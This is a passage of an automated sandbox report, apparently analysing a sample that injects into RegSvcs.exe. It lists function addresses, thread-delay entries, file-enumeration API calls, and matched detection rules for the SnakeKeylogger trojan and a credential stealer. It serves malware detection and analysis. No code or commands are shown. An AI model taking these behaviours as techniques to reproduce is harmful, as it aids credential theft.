Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0222CA08 | 1_2_0222CA08 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_022269A0 | 1_2_022269A0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0222E988 | 1_2_0222E988 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0222CFA9 | 1_2_0222CFA9 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_02226FC8 | 1_2_02226FC8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0222CCD8 | 1_2_0222CCD8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_02229DE0 | 1_2_02229DE0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_02223AA1 | 1_2_02223AA1 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0222E97A | 1_2_0222E97A |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0222F98C | 1_2_0222F98C |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_022239EE | 1_2_022239EE |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_022229EC | 1_2_022229EC |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_02223E09 | 1_2_02223E09 |
Source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: Process Memory Space: 1.exe PID: 8280, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: RegSvcs.exe PID: 8304, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599891 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599766 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599657 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599532 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599422 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599313 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599188 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599063 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598938 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598813 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598703 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598594 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598469 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598359 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598250 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598141 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598032 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597907 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597782 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597657 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597547 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597438 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597313 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597188 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597063 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596938 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596828 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596719 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596594 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596485 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596360 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596235 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596110 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595989 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595860 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595735 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595610 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595485 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595360 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595235 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595110 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594985 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594860 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594735 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594610 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594485 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594360 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594235 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594110 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593985 | Jump to behavior |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_00436ADE |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, | 0_2_00452126 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, | 0_2_0045C999 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00434BEE |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0045DD7C FindFirstFileW,FindClose, | 0_2_0045DD7C |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, | 0_2_0044BD29 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, | 0_2_00436D2D |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00442E1F |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_00475FE5 |
Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_0044BF8D |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599891 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599766 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599657 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599532 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599422 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599313 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599188 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599063 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598938 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598813 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598703 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598594 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598469 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598359 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598250 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598141 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598032 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597907 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597782 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597657 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597547 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597438 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597313 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597188 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597063 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596938 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596828 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596719 | Jump to behavior |
